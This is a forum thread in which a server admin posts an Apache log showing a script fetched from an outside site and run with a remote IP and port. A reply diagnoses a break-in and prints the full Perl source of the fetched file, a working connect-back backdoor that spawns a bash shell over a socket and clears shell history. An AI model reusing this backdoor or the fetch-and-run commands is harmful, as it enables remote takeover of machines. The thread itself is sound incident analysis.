| View previous topic :: View next topic |
| Author |
Message |
jonfr
Veteran
Joined: 20 Jul 2003
Posts: 1008
Location: Denmark
|
 Posted: Sat Jul 10, 2010 5:53 pm Post subject: Apache server hacked ? |
 |
|
After a recent problem with a server that I am hosting, I wanted to check if it was hacked or not. So I did check for errors, I found this in the apache log. My checking is not finished yet.
| Code: | [Wed Jul 07 03:10:14 2010] [notice] Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.2.11-pl1-gentoo configured -- resuming normal operations
[Wed Jul 07 11:00:07 2010] [error] [client 67.195.112.86] File does not exist: /var/www/localhost/htdocs/alvaranbiz/robots.txt
[Wed Jul 07 11:51:24 2010] [error] [client 67.218.116.164] File does not exist: /var/www/localhost/htdocs/robots.txt
[Wed Jul 07 12:28:49 2010] [error] [client 208.80.193.39] (13)Permission denied: file permissions deny server access: /var/www/localhost/htdocs/index.html
[Wed Jul 07 23:41:54 2010] [error] [client 69.58.178.29] File does not exist: /var/www/localhost/htdocs/alvaranbiz/robots.txt
--2010-07-08 08:58:41-- http://xilografical.altervista.org/vvx/c.txt
Resolving xilografical.altervista.org... 76.76.105.44
Connecting to xilografical.altervista.org|76.76.105.44|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1967 (1.9K) [text/plain]
Saving to: `c.txt'
0K . 100% 1.55M=0.001s
2010-07-08 08:58:41 (1.55 MB/s) - `c.txt' saved [1967/1967]
sh: line 1: 15197 Killed perl c.txt 193.232.68.49 2121
[Fri Jul 09 22:22:07 2010] [notice] Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.2.11-pl1-gentoo configured -- resuming normal operations
[Sat Jul 10 00:38:55 2010] [error] [client 208.80.193.34] (13)Permission denied: file permissions deny server access: /var/www/localhost/htdocs/index.html
[Sat Jul 10 03:10:18 2010] [notice] Graceful restart requested, doing restart
apache2: Syntax error on line 148 of /etc/apache2/httpd.conf: Syntax error on line 4 of /etc/apache2/modules.d/70_mod_php5.conf: Cannot load /usr/lib/apache$
[Sat Jul 10 07:54:37 2010] [warn] pid file /var/run/apache2.pid overwritten -- Unclean shutdown of previous Apache run?
[Sat Jul 10 07:54:37 2010] [notice] Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.2.13-pl0-gentoo configured -- resuming normal operations
[Sat Jul 10 07:55:56 2010] [error] [client 192.168.1.7] (13)Permission denied: file permissions deny server access: /var/www/localhost/htdocs/index.html
[Sat Jul 10 07:55:56 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/favicon.ico
[Sat Jul 10 07:55:59 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/favicon.ico
[Sat Jul 10 07:56:06 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/forum
[Sat Jul 10 07:56:15 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/alvaran
[Sat Jul 10 07:56:18 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/alvaran
[Sat Jul 10 07:56:39 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/forum
[Sat Jul 10 11:51:25 2010] [error] [client 67.218.116.164] File does not exist: /var/www/localhost/htdocs/robots.txt
|
I am local client 192.168.1.7.
Thanks for the help. |
|
| Back to top |
|
 |
eccerr0r
Watchman
Joined: 01 Jul 2004
Posts: 9891
Location: almost Mile High in the USA
|
| Posted: Sat Jul 10, 2010 6:05 pm Post subject: |
|
|
Yes this looks very suspicious. Someone managed to find a bug in one of your scripts to get it to download c.txt and then execute it -- all bets are off now. I'm not sure what c.txt does, but apparently someone or something killed it after being executed (quite possibly by the perpetrator...
I'd scrub the machine down. Nothing is trustable on the machine any more.
I'd look at your access log at around the time when that file was downloaded to see what he did.
BTW:Kudos for you for actually finding this and being sceptical that it's normal. A lot of *ix machines get left there assuming everything is fine and dandy... and then their box gets used to attack other boxes...
*sigh*
BTW: I grabbed a copy of the file c.txt:
| Code: |
#!/usr/bin/perl
use IO::Socket;
# Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/bash';
$ARGC=@ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "IHS BACK-CONNECT BACKDOOR \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
|
Yes it looks like a backdoor. But now I'm not sure if it's still doing anything. Either case, you should carefully audit the machine - ideally reinstall.
_________________
Intel Core i7 2700K/Radeon R7 250/24GB DDR3/256GB SSD
What am I supposed watching? |
|
| Back to top |
|
|
jonfr
Veteran
Joined: 20 Jul 2003
Posts: 1008
Location: Denmark
|
| Posted: Sat Jul 10, 2010 6:17 pm Post subject: |
|
|
This is not my computer, so I will have to discuss a reformat with the owner. There are no older logs there. I have done updates over the past 24 hours, this problems started when I was not at home, so there was little I could do at the time.
I don't find the c.txt file on my computer, and I don't know how to do a text search in linux.
I have a rule, I don't trust any computer that is connected to the internet. It does not matter what the computer in question runs as a Operating system. |
|
| Back to top |
|
|
|
|
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
|
Networking & Security
